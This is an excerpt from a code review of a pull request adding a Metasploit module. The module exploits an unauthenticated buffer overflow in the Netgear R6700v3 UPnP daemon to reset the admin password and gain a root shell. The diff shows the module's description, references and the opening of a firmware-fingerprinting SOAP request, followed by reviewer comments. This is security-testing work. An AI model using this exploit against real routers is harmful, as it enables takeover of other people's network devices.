modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb

```diff
@@ -0,0 +1,168 @@
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Netgear R6700v3 Unauthenticated LAN Remote Code Execution',
+        'Description'    => %q{
+        This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on
+        the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57 and
+        V1.0.0.4.84_10.0.58.
+        The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
+        not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary,
+        and reset the router's administrative password to "password". Next, a special packet to port 23/udp is sent
+        which will enable a telnet server on port 23/tcp. The attacker can then login to this telnet server using the new password,
+        and obtain a root shell.
+        These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
+        It should be noted that it is likely that earlier firmware versions are also vulnerable to this attack.
+        This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
+        Radek Domanski).
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+        [
+          'Pedro Ribeiro (@pedrib1337 | pedrib@gmail.com)',             # Vulnerability discovery and Metasploit module
+          'Radek Domanski (@RabbitPro | radek.domanski@gmail.com)'      # Vulnerability discovery and Metasploit module
+        ],
+        'References'     =>
+          [
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'],
+            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/tokyo_drift.md'],
+            [ 'CVE', 'YYYY-XXXXX'],
+            [ 'ZDI', '20-703'],
+            [ 'ZDI', '20-704']
+          ],
+        'DisclosureDate' => "Jun 15 2020",
+        'DefaultTarget'   => 0,
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(5000)
+      ])
+  end
+
+  def get_offset
+    soap =
+    "<?xml version=\"1.0\"?>"\
+    "\r\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"\
+    "\r\n<SOAP-ENV:Body>"\
+    "\r\nSetDeviceNameIconByMAC"\
+    "\r\n<NewBlockSiteName>1"\
+    "\r\n</NewBlockSiteName>"\
+    "\r\n</SOAP-ENV:Body>"\
+    "\r\n</SOAP-ENV:Envelope>"
+
+    # the GetInfo method will helpfully report the firmware version to an unauth request
+    headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"
+
+    res = send_request_cgi({
+      'uri' => 'soap/server_sa HTTP/1.1',
```

Comment:
`HTTP/1.1` shouldn't be required here. Also, the path should begin with `/`.

Reply:
path should be as is to trigger vulnerable condition

Reply:
Marking this as resolved as I have confirmed this is now fixed and @bcoles's original issue has been addressed as he requested. Also the path was changed and still works fine for triggering the bug and checking things so no issues there.